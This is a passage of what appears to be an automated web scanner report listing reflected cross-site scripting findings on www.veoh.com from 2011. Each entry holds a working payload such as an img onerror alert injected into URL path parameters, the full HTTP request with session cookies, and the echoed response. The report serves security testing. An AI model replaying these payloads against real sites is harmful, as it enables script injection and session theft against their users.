if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.425. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v2075425966g5b8E8

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d72a7"><img%20src%3da%20onerror%3dalert(1)>bce4688ba7f was submitted in the REST URL parameter 4. This input was echoed as d72a7"><img src=a onerror=alert(1)>bce4688ba7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventured72a7"><img%20src%3da%20onerror%3dalert(1)>bce4688ba7f/watch/v2075425966g5b8E8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:42 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=78
Content-Length: 76749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventured72a7"><img src=a onerror=alert(1)>bce4688ba7f/sort/most viewed" selected="selected">
...[SNIP]...

1.426. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v2075425966g5b8E8

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e341d<img%20src%3da%20onerror%3dalert(1)>553e22281c1 was submitted in the REST URL parameter 4. This input was echoed as e341d<img src=a onerror=alert(1)>553e22281c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventuree341d<img%20src%3da%20onerror%3dalert(1)>553e22281c1/watch/v2075425966g5b8E8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:36 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=93
Content-Length: 76705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuree341d<img src=a onerror=alert(1)>553e22281c1"}</textarea>
...[SNIP]...

1.427. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v2075425966g5b8E8

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 134b4'%3b0705df69313 was submitted in the REST URL parameter 6. This input was echoed as 134b4';0705df69313 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v2075425966g5b8E8134b4'%3b0705df69313 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:14 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=51
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'182e6e9265c0c89adc0076cdbb27f7c6',
'v2075425966g5b8E8134b4';0705df69313'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.428. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cf07"><img%20src%3da%20onerror%3dalert(1)>5bb73bd76de was submitted in the REST URL parameter 4. This input was echoed as 6cf07"><img src=a onerror=alert(1)>5bb73bd76de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure6cf07"><img%20src%3da%20onerror%3dalert(1)>5bb73bd76de/watch/v20754927ZpAfSEzt HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:12 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=62
Content-Length: 76243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure6cf07"><img src=a onerror=alert(1)>5bb73bd76de/sort/most viewed" selected="selected">
...[SNIP]...

1.429. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9241d<img%20src%3da%20onerror%3dalert(1)>74c4f0281bf was submitted in the REST URL parameter 4. This input was echoed as 9241d<img src=a onerror=alert(1)>74c4f0281bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure9241d<img%20src%3da%20onerror%3dalert(1)>74c4f0281bf/watch/v20754927ZpAfSEzt HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:48 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=63
Content-Length: 76199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure9241d<img src=a onerror=alert(1)>74c4f0281bf"}</textarea>
...[SNIP]...

1.430. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f615e'%3b41e7360e1ba was submitted in the REST URL parameter 6. This input was echoed as f615e';41e7360e1ba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v20754927ZpAfSEztf615e'%3b41e7360e1ba HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=64
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'5591f40422a84545ee8f5d97b940cf99',
'v20754927ZpAfSEztf615e';41e7360e1ba'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.431. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29b15"><img%20src%3da%20onerror%3dalert(1)>23623364388 was submitted in the REST URL parameter 4. This input was echoed as 29b15"><img src=a onerror=alert(1)>23623364388 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure29b15"><img%20src%3da%20onerror%3dalert(1)>23623364388/watch/v20756872Ta2Y7sDB HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:30 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=73
Content-Length: 76696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure29b15"><img src=a onerror=alert(1)>23623364388/sort/most viewed" selected="selected">
...[SNIP]...

1.432. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c9a6b<img%20src%3da%20onerror%3dalert(1)>0a8a5dfab55 was submitted in the REST URL parameter 4. This input was echoed as c9a6b<img src=a onerror=alert(1)>0a8a5dfab55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventurec9a6b<img%20src%3da%20onerror%3dalert(1)>0a8a5dfab55/watch/v20756872Ta2Y7sDB HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=19
Content-Length: 76652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventurec9a6b<img src=a onerror=alert(1)>0a8a5dfab55"}</textarea>
...[SNIP]...

1.433. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80777'%3b1ead9050767 was submitted in the REST URL parameter 6. This input was echoed as 80777';1ead9050767 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB80777'%3b1ead9050767 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:48 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'b138432a0face8cd7e780e59252637f7',
'v20756872Ta2Y7sDB80777';1ead9050767'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.434. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20757961gnh48zmS

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55707"><img%20src%3da%20onerror%3dalert(1)>2b623c86a4a was submitted in the REST URL parameter 4. This input was echoed as 55707"><img src=a onerror=alert(1)>2b623c86a4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure55707"><img%20src%3da%20onerror%3dalert(1)>2b623c86a4a/watch/v20757961gnh48zmS HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:23 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=100
Content-Length: 76349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure55707"><img src=a onerror=alert(1)>2b623c86a4a/sort/most viewed" selected="selected">
...[SNIP]...

1.435. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20757961gnh48zmS

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a9c05<img%20src%3da%20onerror%3dalert(1)>ebb993b4b67 was submitted in the REST URL parameter 4. This input was echoed as a9c05<img src=a onerror=alert(1)>ebb993b4b67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventurea9c05<img%20src%3da%20onerror%3dalert(1)>ebb993b4b67/watch/v20757961gnh48zmS HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=78
Content-Length: 76305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
